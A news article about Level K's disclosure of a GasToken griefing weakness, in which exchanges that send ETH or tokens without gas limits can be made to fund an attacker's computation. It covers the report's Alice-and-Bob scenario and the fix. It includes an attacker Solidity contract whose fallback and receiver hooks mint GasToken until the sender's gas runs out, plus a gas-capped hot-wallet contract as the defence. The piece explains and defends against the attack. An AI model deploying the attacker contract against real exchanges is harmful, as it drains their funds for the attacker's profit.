Level K, a DApp and Ethereum smart contract development firm, recently disclosed a weakness in how some services send ETH on the Ethereum blockchain: an attacker who receives ETH from a sender that does not cap the gas on its transactions can make that sender pay for minting GasTokens in large amounts. The information was published on the 21st of November. According to the company, the exchanges at risk from this attack have been notified and have made software changes that would prevent such an attack should a bad actor attempt one.
GasToken Vulnerability On Ethereum’s Blockchain
According to the report, the window of vulnerability opens whenever ether is sent to an address that can carry out arbitrary computation paid for by the originator of the transaction, in practice a contract whose fallback function runs when it receives funds. This brings a risk of griefing: an attack whose purpose is to inflict a loss on the victim rather than, or in addition to, earning the attacker a direct profit. In theory, if no gas limit protection is in place, an attacker can bill transaction originators such as exchanges for an amount of computation of the attacker's choosing, up to the block gas limit.
By minting GasTokens at the moment the ETH is received, the attacker can turn that griefing into a profit: the exchange pays the gas needed to mint the tokens, and the attacker keeps them.
The report states that the risk is not limited to ETH alone. Other Ethereum-based tokens such as ERC-20 and ERC-721 tokens can be affected, because transferring them is itself a contract call that executes code. Exchanges that do not set a gas limit on these transactions may end up paying for far more computation than a transfer should need, to the benefit of the attacker.
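The receiving side of the attack described above, written out as an added example that is not code from the report or from Level K. It assumes the GasToken contract address is passed in at deployment, that `mint(uint256)` is the GasToken mint entry point, and that 120,000 gas is a safe margin to leave before the last mint (`MIN_GAS_PER_MINT`, an assumed constant). The contract name and the `sweep` helper are likewise hypothetical.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Subset of the GasToken (GST1/GST2) ERC20 interface: mint(n) creates n units of
// refundable state (storage slots for GST1, tiny child contracts for GST2), paid
// for by whoever is executing the current transaction.
interface IGasToken {
    function mint(uint256 value) external;
}

// Standard ERC-721 receiver hook (EIP-721). safeTransferFrom to a contract invokes
// it, so an ERC-721 withdrawal reaches the same code path as a plain ETH one.
interface IERC721Receiver {
    function onERC721Received(address operator, address from, uint256 tokenId, bytes calldata data)
        external returns (bytes4);
}

// Hypothetical contract address an attacker would hand to an exchange as a
// withdrawal destination. Every way of delivering value to it ends in _drain().
contract GriefingReceiver is IERC721Receiver {
    IGasToken public immutable gasToken;   // GasToken address supplied by the deployer (assumption)
    address public immutable owner;

    // Assumed safety margin: stop minting while at least this much gas remains, so
    // the final mint() cannot run out of gas and revert the whole transaction
    // (a revert would still burn the sender's gas, but would lose the minted tokens).
    uint256 internal constant MIN_GAS_PER_MINT = 120_000;

    constructor(IGasToken _gasToken) {
        gasToken = _gasToken;
        owner = msg.sender;
    }

    // Convert the sender's gas into GasToken one unit at a time until the gas the
    // sender forwarded is nearly exhausted. With no gas cap on the sender's side this
    // runs up to the block gas limit; with a 2300-gas stipend (transfer()/send()) the
    // first mint() call fails and the transfer reverts instead, which is harmless.
    function _drain() internal {
        while (gasleft() > MIN_GAS_PER_MINT) {
            gasToken.mint(1);
        }
    }

    // Plain ETH sends (an exchange withdrawal) land here.
    receive() external payable {
        _drain();
    }

    // Calls with unrecognised calldata land here.
    fallback() external payable {
        _drain();
    }

    // ERC-721 safeTransferFrom lands here; returning the selector accepts the token.
    function onERC721Received(address, address, uint256, bytes calldata)
        external override returns (bytes4)
    {
        _drain();
        return IERC721Receiver.onERC721Received.selector;
    }

    // The attacker later collects the ETH; the minted GasToken is an ordinary ERC20
    // balance held by this contract and can be transferred out or freed the same way.
    function sweep(address payable to) external {
        require(msg.sender == owner, "not owner");
        to.transfer(address(this).balance);
    }
}
```

The loop is bounded only by the gas the sender attached to the transaction, which is the whole point: the exchange, not the attacker, decides how much gas is available, and if it attaches the block gas limit the attacker mints GasToken with all of it. The tokens are later freed in the attacker's own transactions for a gas refund, or sold.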
The report includes the following hypothetical case study:
“In an exploit scenario, Alice runs a cryptocurrency exchange and Bob has plans to cause Alice harm. Bob can easily initiate withdrawals, sending them to a contract address that is under his control. This address will rely on a computationally intensive fallback function. If Alice doesn’t set a gas limit, she will end up paying transaction fees from her wallet. Bob, with enough transactions, can drain the funds from Alice’s wallet. If Alice doesn’t have a KYC policy, Bob will be able to create several accounts and circumvent the withdrawal limits of single accounts. Also, Bob can mint GasTokens using his fallback function if he wants to make a profit while draining Alice’s wallet.”
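Alice's side of the scenario above, as an added example that is not from the report: a hot-wallet contract with the unbounded withdrawal beside the gas-capped one. The contract name, the operator role and the 2300-gas cap (`RECIPIENT_GAS`, chosen to match the stipend that `transfer()` and `send()` forward) are assumptions for this example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Hypothetical exchange hot wallet: an operator key triggers user withdrawals.
contract HotWallet {
    address public immutable operator;

    // Gas forwarded to the recipient. 2300 is the same stipend as transfer()/send():
    // enough for an externally owned account or a receive() that only emits an event,
    // far too little to mint GasToken or run any other expensive fallback.
    uint256 internal constant RECIPIENT_GAS = 2300;   // assumed value

    constructor() {
        operator = msg.sender;
    }

    modifier onlyOperator() {
        require(msg.sender == operator, "not operator");
        _;
    }

    // Deposits into the hot wallet.
    receive() external payable {}

    // Vulnerable: call{value: ...} forwards all remaining gas, so a contract
    // recipient decides how much of the operator's gas budget is burned, and can
    // spend it minting GasToken at Alice's expense.
    function withdrawUnbounded(address payable to, uint256 amount) external onlyOperator {
        (bool ok, ) = to.call{value: amount}("");
        require(ok, "send failed");
    }

    // Hardened: cap the gas the recipient may consume. An expensive fallback now
    // runs out of gas and the withdrawal reverts; the operator pays at most the
    // transaction's base cost plus RECIPIENT_GAS, never an attacker-chosen amount.
    function withdraw(address payable to, uint256 amount) external onlyOperator {
        (bool ok, ) = to.call{value: amount, gas: RECIPIENT_GAS}("");
        require(ok, "recipient rejected transfer or exceeded gas cap");
    }
}
```

When the hot wallet is an externally owned account that signs raw transactions rather than a contract, the equivalent control is the gas limit field of the transaction itself: a plain ETH transfer to an externally owned account costs exactly 21,000 gas, so a withdrawal signed with that limit cannot be made to pay for anything more, whatever the destination contains. That transaction-level limit is the protection the report refers to.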
Level K states that all the exchanges that may be affected by this attack have been privately notified and encouraged to take precautions against possible attacks. The notification was sent to as many cryptocurrency exchanges as possible, and these exchanges have implemented the patches. Since the first report reached the public, Level K has published more information about the vulnerability and the actions that can be taken to contain it.